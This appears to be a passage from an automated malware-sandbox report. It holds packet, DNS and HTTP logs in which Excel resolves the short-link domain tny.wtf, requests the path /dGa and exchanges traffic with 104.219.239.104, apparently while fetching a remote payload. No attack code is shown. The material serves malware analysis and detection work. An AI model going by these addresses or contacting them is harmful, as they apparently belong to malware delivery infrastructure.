                        Jul 26, 2024 13:40:28.709089041 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709089041 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709096909 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709135056 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709148884 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709192991 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709192991 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.709908009 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709940910 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709959030 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709975004 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.709990978 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710007906 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710021019 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710021019 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710021019 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710024118 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710041046 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710813999 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710832119 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710864067 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710880995 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710891008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710891008 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710897923 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710922003 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710937977 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.710974932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710974932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.710974932 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.711822987 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711832047 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711842060 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711847067 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711852074 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711858034 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711867094 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711873055 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711878061 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.711911917 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.711911917 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.711911917 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.712074995 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.712683916 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712690115 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712698936 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712703943 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712708950 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712713957 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712722063 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712728977 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.712742090 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.713655949 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713661909 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713670969 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713676929 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713680983 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713685989 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713696003 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713701010 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.713711977 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.713712931 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.714643002 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714652061 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714657068 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714662075 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714672089 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714677095 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714682102 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714692116 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.714694023 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.714694023 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.714694977 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.715393066 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715405941 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715415001 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715420008 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715429068 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715434074 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715437889 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715444088 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.715445042 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.715445042 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.715445042 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.715454102 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716135025 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.716135025 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.716305017 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716310024 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716319084 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716325045 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716332912 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716337919 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716346979 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716351986 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716361046 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.716372967 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.716510057 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.717197895 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717207909 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717212915 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717217922 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717223883 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717233896 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717238903 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717245102 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717252970 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.717283010 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.717283010 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.717283010 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.718036890 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718043089 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718051910 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718056917 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718061924 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718066931 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718076944 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.718113899 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.718113899 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.718113899 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.720143080 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.755556107 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.755563974 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.755574942 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.755645037 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.755736113 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.755740881 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.755752087 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.756047010 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.756083012 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.756514072 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.794244051 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794303894 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794310093 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794410944 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.794555902 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794560909 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794569016 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794574976 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794641018 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.794992924 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.794996977 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795006037 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795010090 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795020103 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795039892 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.795074940 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.795074940 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.795604944 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795608997 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795618057 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795622110 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795627117 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795630932 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795640945 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795644999 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.795650005 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796325922 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.796325922 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.796478987 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796494961 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796504021 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796508074 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796515942 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796520948 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796530008 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796534061 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796540022 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.796540976 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.796600103 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.796600103 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.798012972 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798018932 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798027039 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798032045 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798036098 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798039913 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798043966 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798053980 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798058033 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798084021 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.798122883 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.798412085 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798417091 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798424959 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798429966 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798434019 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798439026 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798444033 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798453093 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798455954 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.798481941 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.798481941 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.798520088 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.799396038 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799401045 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799410105 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799415112 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799417973 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799422026 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799427032 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799437046 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799439907 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799444914 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.799467087 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.799500942 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.800384998 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800390959 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800399065 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800404072 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800410986 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800415993 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800422907 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800426960 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800431013 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.800513029 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.800513029 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.801346064 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801351070 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801358938 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801363945 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801367998 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801373959 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801378965 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801388025 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801392078 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.801415920 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.801454067 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.802241087 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802246094 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802253962 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802258968 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802265882 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802269936 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802273989 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802283049 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802285910 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802290916 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802295923 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802300930 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.802318096 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.802352905 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.802352905 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.803117037 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803122044 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803128958 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803133965 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803139925 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803144932 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803153038 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803157091 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803160906 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803165913 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803169966 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803184986 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.803221941 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.803221941 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.803853035 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.803980112 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803986073 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803993940 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.803999901 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.804111004 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.804111004 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.808638096 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.808643103 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.808712959 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.841814995 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.841825962 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.841830969 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.842040062 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.842086077 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.842094898 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.842137098 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.842140913 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.842149973 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.842209101 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.842209101 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.897579908 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.897788048 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.897795916 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.897833109 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.897835970 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.897845030 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.897893906 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.898058891 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.898118973 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.898123980 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.898169994 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.898319960 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.898324966 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.898334026 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.898339033 CEST8049166104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:28.898379087 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:28.964885950 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:29.915410995 CEST4916680192.168.2.22104.219.239.104
                        Jul 26, 2024 13:41:20.428843021 CEST4916380192.168.2.22188.114.97.3
                        Jul 26, 2024 13:41:20.428925037 CEST4916480192.168.2.22188.114.96.3

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 26, 2024 13:40:18.519270897 CEST5456253192.168.2.228.8.8.8
                        Jul 26, 2024 13:40:18.532171965 CEST53545628.8.8.8192.168.2.22
                        Jul 26, 2024 13:40:20.662591934 CEST5291753192.168.2.228.8.8.8
                        Jul 26, 2024 13:40:20.676371098 CEST53529178.8.8.8192.168.2.22
                        Jul 26, 2024 13:40:22.393549919 CEST6275153192.168.2.228.8.8.8
                        Jul 26, 2024 13:40:22.407102108 CEST53627518.8.8.8192.168.2.22
                        Jul 26, 2024 13:40:22.408610106 CEST5789353192.168.2.228.8.8.8
                        Jul 26, 2024 13:40:22.415918112 CEST53578938.8.8.8192.168.2.22
                        Jul 26, 2024 13:40:26.216869116 CEST5482153192.168.2.228.8.8.8
                        Jul 26, 2024 13:40:26.236521959 CEST53548218.8.8.8192.168.2.22
                        Jul 26, 2024 13:40:26.237873077 CEST5471953192.168.2.228.8.8.8
                        Jul 26, 2024 13:40:26.246084929 CEST53547198.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 26, 2024 13:40:18.519270897 CEST192.168.2.228.8.8.80x5750Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:20.662591934 CEST192.168.2.228.8.8.80x24b1Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:22.393549919 CEST192.168.2.228.8.8.80x7764Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:22.408610106 CEST192.168.2.228.8.8.80x7ef5Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:26.216869116 CEST192.168.2.228.8.8.80x1100Standard query (0)tny.wtfA (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:26.237873077 CEST192.168.2.228.8.8.80x2664Standard query (0)tny.wtfA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 26, 2024 13:40:18.532171965 CEST8.8.8.8192.168.2.220x5750No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:18.532171965 CEST8.8.8.8192.168.2.220x5750No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:20.676371098 CEST8.8.8.8192.168.2.220x24b1No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:20.676371098 CEST8.8.8.8192.168.2.220x24b1No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:22.407102108 CEST8.8.8.8192.168.2.220x7764No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:22.407102108 CEST8.8.8.8192.168.2.220x7764No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:22.415918112 CEST8.8.8.8192.168.2.220x7ef5No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:22.415918112 CEST8.8.8.8192.168.2.220x7ef5No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:26.236521959 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:26.236521959 CEST8.8.8.8192.168.2.220x1100No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:26.246084929 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.96.3A (IP address)IN (0x0001)false
                        Jul 26, 2024 13:40:26.246084929 CEST8.8.8.8192.168.2.220x2664No error (0)tny.wtf188.114.97.3A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • tny.wtf
                        • 104.219.239.104

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.2249161188.114.97.3801892C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampBytes transferredDirectionData
                        Jul 26, 2024 13:40:18.547000885 CEST317OUTGET /dGa HTTP/1.1
                        Accept: */*
